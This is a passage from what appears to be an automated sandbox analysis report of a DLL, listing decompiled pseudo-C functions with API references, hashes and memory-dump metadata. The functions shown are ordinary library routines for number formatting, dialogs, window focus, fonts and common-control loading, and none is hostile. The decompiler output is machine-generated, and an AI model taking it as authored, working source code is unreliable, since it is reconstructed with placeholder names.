                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Classlstrlen$H_prologInfoRegister
                                                                        • String ID:
                                                                        • API String ID: 3690589370-0
                                                                        • Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                        • Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
                                                                        • Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                        • Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
                                                                        				intOrPtr _v8;
                                                                        				char _v9;
                                                                        				signed int _v10;
                                                                        				signed int _v14;
                                                                        				signed int _v18;
                                                                        				signed short _v20;
                                                                        				char _v21;
                                                                        				char _v22;
                                                                        				char _v23;
                                                                        				char _v24;
                                                                        				char _v25;
                                                                        				char _v26;
                                                                        				char _v27;
                                                                        				char _v28;
                                                                        				char _v29;
                                                                        				char _v30;
                                                                        				char _v31;
                                                                        				char _v32;
                                                                        				char _v44;
                                                                        				signed int _v48;
                                                                        				signed short* _v52;
                                                                        				intOrPtr _t87;
                                                                        				signed int _t88;
                                                                        				signed short* _t99;
                                                                        				intOrPtr* _t100;
                                                                        				signed int _t101;
                                                                        				signed short _t103;
                                                                        				signed int _t105;
                                                                        				signed short* _t131;
                                                                        				signed int _t133;
                                                                        				signed int _t139;
                                                                        				signed short* _t141;
                                                                        				signed short _t149;
                                                                        				signed int _t151;
                                                                        				signed int _t152;
                                                                        				signed int _t159;
                                                                        				signed int _t161;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        				void* _t166;
                                                                        
                                                                        				_t87 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t87;
                                                                        				_t88 = _a12;
                                                                        				_t131 = _a24;
                                                                        				_t133 = _t88 & 0x00008000;
                                                                        				_v32 = 0xcc;
                                                                        				_v31 = 0xcc;
                                                                        				_v30 = 0xcc;
                                                                        				_v29 = 0xcc;
                                                                        				_v28 = 0xcc;
                                                                        				_v27 = 0xcc;
                                                                        				_v26 = 0xcc;
                                                                        				_v25 = 0xcc;
                                                                        				_v24 = 0xcc;
                                                                        				_v23 = 0xcc;
                                                                        				_v22 = 0xfb;
                                                                        				_v21 = 0x3f;
                                                                        				_v48 = 1;
                                                                        				_t149 = _t88 & 0x00007fff;
                                                                        				if(_t133 == 0) {
                                                                        					_t131[1] = 0x20;
                                                                        				} else {
                                                                        					_t131[1] = 0x2d;
                                                                        				}
                                                                        				_t151 = _a8;
                                                                        				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
                                                                        					if(_t149 != 0x7fff) {
                                                                        						_t90 = _t149 & 0x0000ffff;
                                                                        						_v20 = _v20 & 0x00000000;
                                                                        						_v18 = _a4;
                                                                        						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
                                                                        						_v10 = _t149;
                                                                        						_v14 = _t151;
                                                                        						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
                                                                        						_t166 = _t165 + 0xc;
                                                                        						__eflags = _v10 - 0x3fff;
                                                                        						if(_v10 >= 0x3fff) {
                                                                        							_t159 = _t159 + 1;
                                                                        							__eflags = _t159;
                                                                        							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
                                                                        						}
                                                                        						__eflags = _a20 & 0x00000001;
                                                                        						_t152 = _a16;
                                                                        						 *_t131 = _t159;
                                                                        						if((_a20 & 0x00000001) == 0) {
                                                                        							L27:
                                                                        							__eflags = _t152 - 0x15;
                                                                        							if(_t152 > 0x15) {
                                                                        								_t152 = 0x15;
                                                                        							}
                                                                        							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
                                                                        							_t52 =  &_v10;
                                                                        							 *_t52 = _v10 & 0x00000000;
                                                                        							__eflags =  *_t52;
                                                                        							_a12 = 8;
                                                                        							do {
                                                                        								E1001B6CD( &_v20);
                                                                        								_t56 =  &_a12;
                                                                        								 *_t56 = _a12 - 1;
                                                                        								__eflags =  *_t56;
                                                                        							} while ( *_t56 != 0);
                                                                        							__eflags = _t161;
                                                                        							if(_t161 < 0) {
                                                                        								_t164 =  ~_t161 & 0x000000ff;
                                                                        								__eflags = _t164;
                                                                        								if(_t164 > 0) {
                                                                        									do {
                                                                        										E1001B6FB( &_v20);
                                                                        										_t164 = _t164 - 1;
                                                                        										__eflags = _t164;
                                                                        									} while (_t164 != 0);
                                                                        								}
                                                                        							}
                                                                        							_t59 = _t152 + 1; // 0xcd
                                                                        							_t139 = _t59;
                                                                        							__eflags = _t139;
                                                                        							_t99 =  &(_t131[2]);
                                                                        							_v52 = _t99;
                                                                        							if(_t139 > 0) {
                                                                        								_a12 = _t139;
                                                                        								do {
                                                                        									asm("movsd");
                                                                        									asm("movsd");
                                                                        									asm("movsd");
                                                                        									E1001B6CD( &_v20);
                                                                        									E1001B6CD( &_v20);
                                                                        									E1001B66F(__eflags,  &_v20,  &_v44);
                                                                        									E1001B6CD( &_v20);
                                                                        									_t166 = _t166 + 0x14;
                                                                        									_v52 =  &(_v52[0]);
                                                                        									_t74 =  &_a12;
                                                                        									 *_t74 = _a12 - 1;
                                                                        									__eflags =  *_t74;
                                                                        									 *_v52 = _v9 + 0x30;
                                                                        									_v9 = 0;
                                                                        								} while ( *_t74 != 0);
                                                                        								_t99 = _v52;
                                                                        							}
                                                                        							_t100 = _t99 - 1;
                                                                        							_t101 = _t100 - 1;
                                                                        							__eflags =  *_t100 - 0x35;
                                                                        							_t141 =  &(_t131[2]);
                                                                        							if( *_t100 < 0x35) {
                                                                        								while(1) {
                                                                        									__eflags = _t101 - _t141;
                                                                        									if(_t101 < _t141) {
                                                                        										break;
                                                                        									}
                                                                        									__eflags =  *_t101 - 0x30;
                                                                        									if( *_t101 == 0x30) {
                                                                        										_t101 = _t101 - 1;
                                                                        										__eflags = _t101;
                                                                        										continue;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								__eflags = _t101 - _t141;
                                                                        								if(_t101 >= _t141) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									 *_t141 = 0x30;
                                                                        									goto L54;
                                                                        								}
                                                                        							} else {
                                                                        								while(1) {
                                                                        									__eflags = _t101 - _t141;
                                                                        									if(_t101 < _t141) {
                                                                        										break;
                                                                        									}
                                                                        									__eflags =  *_t101 - 0x39;
                                                                        									if( *_t101 == 0x39) {
                                                                        										 *_t101 = 0x30;
                                                                        										_t101 = _t101 - 1;
                                                                        										__eflags = _t101;
                                                                        										continue;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								__eflags = _t101 - _t141;
                                                                        								if(_t101 < _t141) {
                                                                        									_t101 = _t101 + 1;
                                                                        									 *_t131 =  *_t131 + 1;
                                                                        									__eflags =  *_t131;
                                                                        								}
                                                                        								 *_t101 =  *_t101 + 1;
                                                                        								__eflags =  *_t101;
                                                                        								L46:
                                                                        								_t103 = _t101 - _t131 - 3;
                                                                        								__eflags = _t103;
                                                                        								_t131[1] = _t103;
                                                                        								 *((char*)( &(_t131[2]) + _t103)) = 0;
                                                                        								goto L47;
                                                                        							}
                                                                        						} else {
                                                                        							_t152 = _t152 + _t159;
                                                                        							__eflags = _t152;
                                                                        							if(_t152 > 0) {
                                                                        								goto L27;
                                                                        							} else {
                                                                        								goto L26;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						 *_t131 = 1;
                                                                        						if(_t151 != 0x80000000 || _a4 != 0) {
                                                                        							if((_t151 & 0x40000000) != 0) {
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_push("1#SNAN");
                                                                        								goto L21;
                                                                        							}
                                                                        						} else {
                                                                        							L11:
                                                                        							__eflags = _t133;
                                                                        							if(_t133 == 0) {
                                                                        								L15:
                                                                        								__eflags = _t151 - 0x80000000;
                                                                        								if(_t151 != 0x80000000) {
                                                                        									goto L20;
                                                                        								} else {
                                                                        									__eflags = _a4;
                                                                        									if(_a4 != 0) {
                                                                        										goto L20;
                                                                        									} else {
                                                                        										_push("1#INF");
                                                                        										goto L18;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = _t151 - 0xc0000000;
                                                                        								if(_t151 != 0xc0000000) {
                                                                        									goto L15;
                                                                        								} else {
                                                                        									__eflags = _a4;
                                                                        									if(_a4 != 0) {
                                                                        										L20:
                                                                        										_push("1#QNAN");
                                                                        										L21:
                                                                        										_push( &(_t131[2]));
                                                                        										E10017B90();
                                                                        										_t131[1] = 6;
                                                                        									} else {
                                                                        										_push("1#IND");
                                                                        										L18:
                                                                        										_push( &(_t131[2]));
                                                                        										E10017B90();
                                                                        										_t131[1] = 5;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_v48 = _v48 & 0x00000000;
                                                                        						L47:
                                                                        						_t105 = _v48;
                                                                        					}
                                                                        				} else {
                                                                        					L26:
                                                                        					_t131[2] = 0x30;
                                                                        					L54:
                                                                        					 *_t131 =  *_t131 & 0x00000000;
                                                                        					_t131[1] = 0x20;
                                                                        					_t131[1] = 1;
                                                                        					_t131[2] = 0;
                                                                        					_t105 = 1;
                                                                        				}
                                                                        				return E100117AE(_t105, _v8);
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: _strcat$___shr_12
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                        • API String ID: 1152255961-4131533671
                                                                        • Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                        • Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
                                                                        • Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                        • Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E1001F0D1(intOrPtr* __ecx) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t67;
                                                                        				intOrPtr* _t68;
                                                                        				signed int _t74;
                                                                        				signed int _t76;
                                                                        				struct HWND__* _t77;
                                                                        				signed int _t80;
                                                                        				int _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr* _t107;
                                                                        				signed int _t116;
                                                                        				signed int _t135;
                                                                        				DLGTEMPLATE* _t136;
                                                                        				struct HWND__* _t138;
                                                                        				void* _t139;
                                                                        				void* _t141;
                                                                        
                                                                        				_t109 = __ecx;
                                                                        				E10011BF0(0x1003a3de, _t139);
                                                                        				_t107 = __ecx;
                                                                        				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
                                                                        				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
                                                                        				if( *(_t139 + 0x10) == 0) {
                                                                        					 *(_t139 + 0x10) =  *(E100373B5() + 0xc);
                                                                        				}
                                                                        				_t135 =  *(E100373B5() + 0x1038);
                                                                        				 *(_t139 - 0x28) = _t135;
                                                                        				 *(_t139 - 0x14) = 0;
                                                                        				 *((intOrPtr*)(_t139 - 0x24)) = 0;
                                                                        				 *(_t139 - 4) = 0;
                                                                        				E10021D47(_t109, 0x10);
                                                                        				E10021D47(_t109, 0x7c000);
                                                                        				if(_t135 == 0) {
                                                                        					_t136 =  *(_t139 + 8);
                                                                        					L7:
                                                                        					__eflags = _t136;
                                                                        					if(__eflags == 0) {
                                                                        						L4:
                                                                        						_t67 = 0;
                                                                        						L32:
                                                                        						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
                                                                        						return _t67;
                                                                        					}
                                                                        					_t68 = E100243B2();
                                                                        					_t129 =  *_t68;
                                                                        					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
                                                                        					 *(_t139 - 4) = 1;
                                                                        					 *((intOrPtr*)(_t139 - 0x18)) = 0;
                                                                        					__eflags = E10024A3D(_t107, 0, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
                                                                        					__eflags =  *0x1004efe4; // 0x0
                                                                        					_t74 = 0 | __eflags == 0x00000000;
                                                                        					if(__eflags == 0) {
                                                                        						L14:
                                                                        						__eflags = _t74;
                                                                        						if(_t74 == 0) {
                                                                        							L17:
                                                                        							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
                                                                        							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
                                                                        							_push(_t107);
                                                                        							E100237EE();
                                                                        							_t76 =  *(_t139 + 0xc);
                                                                        							__eflags = _t76;
                                                                        							if(_t76 != 0) {
                                                                        								_t77 =  *(_t76 + 0x1c);
                                                                        							} else {
                                                                        								_t77 = 0;
                                                                        							}
                                                                        							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB68, 0);
                                                                        							E100014B0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
                                                                        							_t116 =  *(_t139 - 0x28);
                                                                        							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
                                                                        							__eflags = _t116;
                                                                        							if(_t116 != 0) {
                                                                        								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
                                                                        								__eflags = _t138;
                                                                        								if(_t138 != 0) {
                                                                        									 *((intOrPtr*)( *_t107 + 0x12c))(0);
                                                                        								}
                                                                        							}
                                                                        							_t80 = E10022196();
                                                                        							__eflags = _t80;
                                                                        							if(_t80 == 0) {
                                                                        								 *((intOrPtr*)( *_t107 + 0x114))();
                                                                        							}
                                                                        							__eflags = _t138;
                                                                        							if(_t138 != 0) {
                                                                        								__eflags =  *(_t107 + 0x38) & 0x00000010;
                                                                        								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
                                                                        									DestroyWindow(_t138);
                                                                        									_t138 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t139 - 0x14);
                                                                        							if( *(_t139 - 0x14) != 0) {
                                                                        								GlobalUnlock( *(_t139 - 0x14));
                                                                        								GlobalFree( *(_t139 - 0x14));
                                                                        							}
                                                                        							__eflags = _t138;
                                                                        							_t60 = _t138 != 0;
                                                                        							__eflags = _t60;
                                                                        							_t67 = 0 | _t60;
                                                                        							goto L32;
                                                                        						}
                                                                        						L15:
                                                                        						E10024A0E(_t139 - 0x38, _t136);
                                                                        						 *(_t139 - 4) = 2;
                                                                        						E10024970(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
                                                                        						 *(_t139 - 0x14) = E10024724(_t139 - 0x38);
                                                                        						 *(_t139 - 4) = 1;
                                                                        						E10024716(_t139 - 0x38);
                                                                        						__eflags =  *(_t139 - 0x14);
                                                                        						if( *(_t139 - 0x14) != 0) {
                                                                        							_t136 = GlobalLock( *(_t139 - 0x14));
                                                                        						}
                                                                        						goto L17;
                                                                        					}
                                                                        					__eflags = _t74;
                                                                        					if(_t74 != 0) {
                                                                        						goto L15;
                                                                        					}
                                                                        					_t96 = GetSystemMetrics(0x2a);
                                                                        					__eflags = _t96;
                                                                        					if(_t96 == 0) {
                                                                        						goto L17;
                                                                        					}
                                                                        					_t97 = E10011CB0(_t107, 0,  *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
                                                                        					asm("sbb al, al");
                                                                        					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
                                                                        					__eflags = _t74;
                                                                        					if(_t74 == 0) {
                                                                        						goto L17;
                                                                        					}
                                                                        					__eflags =  *((short*)(_t139 - 0x18)) - 8;
                                                                        					if( *((short*)(_t139 - 0x18)) == 8) {
                                                                        						 *((intOrPtr*)(_t139 - 0x18)) = 0;
                                                                        					}
                                                                        					goto L14;
                                                                        				}
                                                                        				_push(_t139 - 0x48);
                                                                        				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
                                                                        					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L4;
                                                                        			}






















                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1001F0D6
                                                                        • GetSystemMetrics.USER32 ref: 1001F19A
                                                                        • GlobalLock.KERNEL32 ref: 1001F205
                                                                        • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB68,00000000), ref: 1001F234
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                        • String ID: MS Shell Dlg
                                                                        • API String ID: 2364537584-76309092
                                                                        • Opcode ID: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                        • Instruction ID: 46954fd45d3ebabc0cd1c103719a3d91ff65dea30fed852b23a269951fd2c375
                                                                        • Opcode Fuzzy Hash: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                        • Instruction Fuzzy Hash: A951AE35900209DFCB11DFA4D8859FEBBB5EF54350F21466AF456EB292DB309E80CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                                                                        				struct HWND__* _v8;
                                                                        				void* __ebp;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        				void* _t29;
                                                                        				struct HWND__* _t30;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				void* _t41;
                                                                        				void* _t44;
                                                                        
                                                                        				_t29 = __ebx;
                                                                        				_push(__ecx);
                                                                        				_t37 = __ecx;
                                                                        				_t12 = E10023092(__ecx);
                                                                        				_t34 = _a4 & 0x0000fff0;
                                                                        				_t41 = _t12;
                                                                        				_t14 = _t34 - 0xf040;
                                                                        				if(_t14 == 0) {
                                                                        					L12:
                                                                        					if(_a8 != 0x75 || _t41 == 0) {
                                                                        						L15:
                                                                        						_t15 = 0;
                                                                        						goto L16;
                                                                        					} else {
                                                                        						E1002040A(_t41);
                                                                        						L11:
                                                                        						_t15 = 1;
                                                                        						L16:
                                                                        						return _t15;
                                                                        					}
                                                                        				}
                                                                        				_t18 = _t14 - 0x10;
                                                                        				if(_t18 == 0) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_t19 = _t18 - 0x10;
                                                                        				if(_t19 == 0 || _t19 == 0xa0) {
                                                                        					if(_t34 == 0xf060 || _a8 != 0) {
                                                                        						if(_t41 != 0) {
                                                                        							_push(_t29);
                                                                        							_t30 =  *(_t37 + 0x1c);
                                                                        							_v8 = GetFocus();
                                                                        							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
                                                                        							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
                                                                        							if(IsWindow(_t30) != 0) {
                                                                        								SetActiveWindow(_t30);
                                                                        							}
                                                                        							if(IsWindow(_v8) != 0) {
                                                                        								SetFocus(_v8);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L11;
                                                                        				} else {
                                                                        					goto L15;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ActiveFocus$MessageSend
                                                                        • String ID: u
                                                                        • API String ID: 1556911595-4067256894
                                                                        • Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                        • Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
                                                                        • Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                        • Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v40;
                                                                        				void _v68;
                                                                        				intOrPtr _v72;
                                                                        				intOrPtr _t14;
                                                                        				void* _t15;
                                                                        				int _t24;
                                                                        				char* _t30;
                                                                        				struct HDC__* _t32;
                                                                        
                                                                        				_t14 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t32 = GetStockObject;
                                                                        				_t24 = 0xa;
                                                                        				_v8 = _t14;
                                                                        				_v72 = __ecx;
                                                                        				_t30 = "System";
                                                                        				_t15 = GetStockObject(0x11);
                                                                        				if(_t15 != 0) {
                                                                        					L2:
                                                                        					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
                                                                        						_t30 =  &_v40;
                                                                        						_t32 = GetDC(0);
                                                                        						if(_v68 < 0) {
                                                                        							_v68 =  ~_v68;
                                                                        						}
                                                                        						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
                                                                        						ReleaseDC(0, _t32);
                                                                        					}
                                                                        					L6:
                                                                        					if(_a4 == 0) {
                                                                        						_a4 = _t24;
                                                                        					}
                                                                        					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
                                                                        				}
                                                                        				_t15 = GetStockObject(0xd);
                                                                        				if(_t15 == 0) {
                                                                        					goto L6;
                                                                        				}
                                                                        				goto L2;
                                                                        			}













                                                                        APIs
                                                                        • GetStockObject.GDI32(00000011), ref: 10024994
                                                                        • GetStockObject.GDI32(0000000D), ref: 1002499C
                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
                                                                        • GetDC.USER32(00000000), ref: 100249B8
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
                                                                        • ReleaseDC.USER32 ref: 100249E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                        • String ID: System
                                                                        • API String ID: 46613423-3470857405
                                                                        • Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                        • Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
                                                                        • Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                        • Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 40%
                                                                        			E1002155E(signed int _a4, signed int _a8) {
                                                                        				struct HINSTANCE__* _t6;
                                                                        				_Unknown_base(*)()* _t7;
                                                                        				struct HINSTANCE__* _t13;
                                                                        				struct HINSTANCE__* _t14;
                                                                        				CHAR* _t16;
                                                                        				signed int _t17;
                                                                        
                                                                        				_t16 = "COMCTL32.DLL";
                                                                        				_t14 = GetModuleHandleA(_t16);
                                                                        				_t6 = LoadLibraryA(_t16);
                                                                        				_t13 = _t6;
                                                                        				if(_t13 == 0) {
                                                                        					return _t6;
                                                                        				} else {
                                                                        					_t17 = 0;
                                                                        					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
                                                                        					if(_t7 != 0) {
                                                                        						_push(_a4);
                                                                        						if( *_t7() != 0) {
                                                                        							_t17 = _a4;
                                                                        							if(_t14 == 0) {
                                                                        								__imp__#17();
                                                                        								_t17 = _t17 | 0x00003fc0;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if((_a8 & 0x00003fc0) == _a8) {
                                                                        							__imp__#17();
                                                                        							_t17 = 0x3fc0;
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t13);
                                                                        					return _t17;
                                                                        				}
                                                                        			}










                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
                                                                        • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
                                                                        • #17.COMCTL32 ref: 1002159F
                                                                        • #17.COMCTL32 ref: 100215BB
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 100215C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                        • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                        • API String ID: 1437655972-4218389149
                                                                        • Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
